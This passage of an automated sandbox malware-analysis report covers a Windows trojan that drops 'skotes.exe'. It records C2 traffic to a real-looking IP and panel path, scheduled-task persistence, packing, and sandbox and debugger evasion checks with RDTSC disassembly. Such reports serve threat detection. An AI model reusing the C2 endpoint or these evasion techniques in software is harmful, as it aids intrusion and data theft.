                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0072BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,5_2_0072BE30
                    Source: unknownHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/8
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php%
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpE
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpL
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpZ
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpd
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phph
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedH
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedo
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpp
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpy

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_007688605_2_00768860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_007670495_2_00767049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_007678BB5_2_007678BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0072E5305_2_0072E530
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00762D105_2_00762D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00724DE05_2_00724DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_007631A85_2_007631A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00724B305_2_00724B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00757F365_2_00757F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0076779B5_2_0076779B
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9983874744550408
                    Source: file.exeStatic PE information: Section: hockpqtz ZLIB complexity 0.9949597149776453
                    Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983874744550408
                    Source: skotes.exe.0.drStatic PE information: Section: hockpqtz ZLIB complexity 0.9949597149776453
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1922048 > 1048576
                    Source: file.exeStatic PE information: Raw size of hockpqtz is bigger than: 0x100000 < 0x1a3600

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 5.2.skotes.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: file.exeStatic PE information: real checksum: 0x1dbb1f should be: 0x1dfa51
                    Source: skotes.exe.0.drStatic PE information: real checksum: 0x1dbb1f should be: 0x1dfa51
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: hockpqtz
                    Source: file.exeStatic PE information: section name: wxulotut
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: hockpqtz
                    Source: skotes.exe.0.drStatic PE information: section name: wxulotut
                    Source: skotes.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0073D91C push ecx; ret 5_2_0073D92F
                    Source: file.exeStatic PE information: section name: entropy: 7.988291086573797
                    Source: file.exeStatic PE information: section name: hockpqtz entropy: 7.955305476537546
                    Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.988291086573797
                    Source: skotes.exe.0.drStatic PE information: section name: hockpqtz entropy: 7.955305476537546
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5C87 second address: 6E5CA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD0F8E1A7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5CA8 second address: 6E5CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FD0F8CDABF9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FD0F8CDABF0h 0x00000019 jmp 00007FD0F8CDABEAh 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBEF1 second address: 6CBF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD0F8E1A7A6h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4C19 second address: 6E4C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4DA1 second address: 6E4DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4DA5 second address: 6E4DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4DAB second address: 6E4DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 jmp 00007FD0F8E1A7B4h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4F5E second address: 6E4F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E520A second address: 6E5227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007FD0F8E1A7A6h 0x0000000c popad 0x0000000d jmp 00007FD0F8E1A7ADh 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9456 second address: 6E94CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FD0F8CDABECh 0x0000000f popad 0x00000010 add dword ptr [esp], 0F2EE646h 0x00000017 jnl 00007FD0F8CDABF2h 0x0000001d jmp 00007FD0F8CDABECh 0x00000022 push 00000003h 0x00000024 xor edx, dword ptr [ebp+122D2DCCh] 0x0000002a push 00000000h 0x0000002c mov edi, dword ptr [ebp+122D29F3h] 0x00000032 push 00000003h 0x00000034 mov edi, dword ptr [ebp+122D215Eh] 0x0000003a push B0800926h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FD0F8CDABF2h 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9599 second address: 6E9648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7B8h 0x00000009 popad 0x0000000a add dword ptr [esp], 06A0303Ch 0x00000011 mov edi, dword ptr [ebp+122D2C23h] 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FD0F8E1A7A8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 jmp 00007FD0F8E1A7B9h 0x00000038 push 00000000h 0x0000003a sub ecx, dword ptr [ebp+122D2A4Fh] 0x00000040 push edx 0x00000041 mov cx, bx 0x00000044 pop edi 0x00000045 push 00000003h 0x00000047 mov edx, dword ptr [ebp+122D2A2Fh] 0x0000004d jmp 00007FD0F8E1A7B9h 0x00000052 call 00007FD0F8E1A7A9h 0x00000057 push edi 0x00000058 push ecx 0x00000059 jmp 00007FD0F8E1A7ADh 0x0000005e pop ecx 0x0000005f pop edi 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9648 second address: 6E9665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD0F8CDABF4h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9665 second address: 6E96AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jp 00007FD0F8E1A7BFh 0x00000014 jmp 00007FD0F8E1A7B9h 0x00000019 mov eax, dword ptr [eax] 0x0000001b jne 00007FD0F8E1A7AAh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a pop edx 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E96AE second address: 6E96DA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD0F8CDABE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov ch, dh 0x0000000f mov esi, dword ptr [ebp+122D2CA3h] 0x00000015 lea ebx, dword ptr [ebp+1245E2E3h] 0x0000001b mov dword ptr [ebp+122D2253h], eax 0x00000021 or dword ptr [ebp+122D17D3h], eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
